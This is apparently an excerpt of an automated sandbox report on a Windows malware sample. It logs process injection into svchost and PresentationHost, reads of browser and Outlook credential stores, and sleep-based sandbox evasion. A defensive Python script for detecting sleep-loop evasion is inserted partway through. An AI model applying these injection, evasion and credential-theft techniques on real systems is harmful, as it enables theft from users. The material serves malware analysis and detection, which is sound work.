          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0066B59E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0067F121
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0066C602
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00604FE9
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeFile created: C:\Users\user\AppData\Local\Temp\aut8BB6.tmpJump to behavior
          Source: nJ8mJTmMf0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: nJ8mJTmMf0.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\nJ8mJTmMf0.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\PresentationHost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\PresentationHost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: nJ8mJTmMf0.exe | Static file information: File size 1234944 > 1048576
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: nJ8mJTmMf0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: PresentationHost.pdbGCTL source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationHost.pdb source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: nJ8mJTmMf0.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nJ8mJTmMf0.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nJ8mJTmMf0.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nJ8mJTmMf0.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nJ8mJTmMf0.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0067C304 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00668719 push FFFFFF8Bh; iretd 0_2_0066871B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0062E94F push edi; ret 0_2_0062E951
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0062EA68 push esi; ret 0_2_0062EA6A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00628B85 push ecx; ret 0_2_00628B98
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0062EC43 push esi; ret 0_2_0062EC45
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0062ED2C push edi; ret 0_2_0062ED2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004070DB push gs; retf 1_2_004071B5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004130B3 push es; iretd 1_2_0041326B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00407134 push gs; retf 1_2_004071B5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403210 push eax; ret 1_2_00403212
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408347 push 62E932ECh; ret 1_2_00408350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040734F push cs; iretd 1_2_00407359
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00422C63 push edi; iretd 1_2_00422C6E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040742D push cs; iretd 1_2_0040742E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416483 push ebx; iretd 1_2_00416485
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00407551 push eax; ret 1_2_00407552
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004135E3 push esi; ret 1_2_004135EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413FD0 push dword ptr [eax+3Bh]; ret 1_2_00413FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320225F pushad ; ret 1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032027FA pushad ; ret 1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx 1_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320283D push eax; iretd 1_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320135E push eax; iretd 1_2_03201369
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082FC83F pushfd ; ret 3_2_082FC840
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082ED067 push esi; ret 3_2_082ED073
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082F9C9C push esp; iretd 3_2_082F9CA0
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082ECCC7 push es; iretd 3_2_082ECCEF
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082FCDAD push ds; iretd 3_2_082FCDEE
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082FC6E7 push edi; iretd 3_2_082FC6F2
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 3_2_082EFF07 push ebx; iretd 3_2_082EFF09
Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04EE27FA pushad ; ret 6_2_04EE27F9
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006855FD
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006233C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006233C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI/Special instruction interceptor: Address: 3943244
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 2165
          Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 7808
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98258
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI coverage: 4.7 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI coverage: 2.6 %
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -80000s >= -30000s
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -42000s >= -30000s
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep count: 35 > 30
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep count: 2165 > 30
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep time: -4330000s >= -30000s
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep count: 7808 > 30
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep time: -15616000s >= -30000s
          Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
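The sleep rows above are consistent with milliseconds rather than seconds despite the "s" suffix: 4,330,000 / 2165 = 2,000 and 15,616,000 / 7808 = 2,000, i.e. a 2 s delay repeated in a loop, while TID 7684 makes a handful of long single sleeps (80 s, 42 s, 35 s). The Python below is an added example, not part of the Joe Sandbox report or the sample: it applies the report's two thresholds (more than 30 sleeps on one thread, or 30 s or more cumulative) to a constructed API trace whose line format (tid=/api=/arg=) is an assumption made here, and normalises NtDelayExecution's 100 ns relative intervals so that the 2 s loop reproduces the 4,330,000 ms figure.

```python
"""Sleep-loop evasion check over an API trace (constructed format, not Joe Sandbox's).
Applies the two thresholds the report uses: >30 sleeps on one thread, or >=30 s total."""
import re
from collections import defaultdict

# Assumed trace line format: "tid=<n> api=<name> arg=<int>"
LINE = re.compile(r"tid=(?P<tid>\d+)\s+api=(?P<api>\w+)\s+arg=(?P<arg>-?\d+)")
MAX_CALLS = 30          # per-thread sleep count threshold
MAX_TOTAL_MS = 30_000   # per-thread cumulative sleep threshold (30 s)


def sleep_ms(api: str, arg: int):
    """Normalise a sleep argument to milliseconds; None if the API is not a sleep."""
    if api in ("Sleep", "SleepEx"):
        return float(arg)                       # Win32 sleeps take milliseconds
    if api == "NtDelayExecution":
        # LARGE_INTEGER in 100 ns units; negative means relative delay,
        # non-negative is an absolute deadline and is not counted as a delay here
        return -arg / 10_000 if arg < 0 else 0.0
    return None


def analyse(lines):
    """Aggregate sleeps per thread and flag threads crossing either threshold."""
    calls, total = defaultdict(int), defaultdict(float)
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        ms = sleep_ms(m["api"], int(m["arg"]))
        if ms is None:
            continue
        tid = int(m["tid"])
        calls[tid] += 1
        total[tid] += ms
    findings = {}
    for tid in calls:
        reasons = []
        if calls[tid] > MAX_CALLS:
            reasons.append(f"sleep count {calls[tid]} > {MAX_CALLS}")
        if total[tid] >= MAX_TOTAL_MS:
            reasons.append(f"cumulative sleep {total[tid]:.0f} ms >= {MAX_TOTAL_MS} ms")
        if reasons:
            findings[tid] = reasons
    return {"calls": dict(calls), "total_ms": dict(total), "findings": findings}


def constructed_trace():
    """Constructed trace mirroring the report: TID 7668 sleeps 2 s 2165 times,
    TID 7684 sleeps 80 s and 42 s once each, TID 1234 is benign."""
    trace = ["tid=7668 api=NtDelayExecution arg=-20000000"] * 2165   # -2 s relative
    trace += ["tid=7684 api=Sleep arg=80000", "tid=7684 api=Sleep arg=42000"]
    trace += ["tid=1234 api=Sleep arg=50", "tid=1234 api=Sleep arg=50",
              "tid=1234 api=NtDelayExecution arg=133000000000000000"]  # absolute deadline
    return trace


if __name__ == "__main__":
    for tid, reasons in analyse(constructed_trace())["findings"].items():
        print(tid, "; ".join(reasons))
```

Both thresholds are kept because they catch different shapes: the count threshold catches many short sleeps that each stay under a sandbox's per-call sleep-skipping limit, the cumulative one catches a few long sleeps. A trace from a real monitor only needs a different LINE pattern and the same two aggregates.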
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00664696
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C93C FindFirstFileW,FindClose,0_2_0066C93C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066C9C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F200
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F35D
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066F65E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663A2B
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663D4E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066BF27
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose,6_2_00B1BDA0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00604AFE
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121513549.0000000001690000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: firefox.exe, 00000007.00000002.2316444293.0000026B9684C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI call chain: ExitProcess graph end nodegraph_0-97659
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI call chain: ExitProcess graph end nodegraph_0-97230
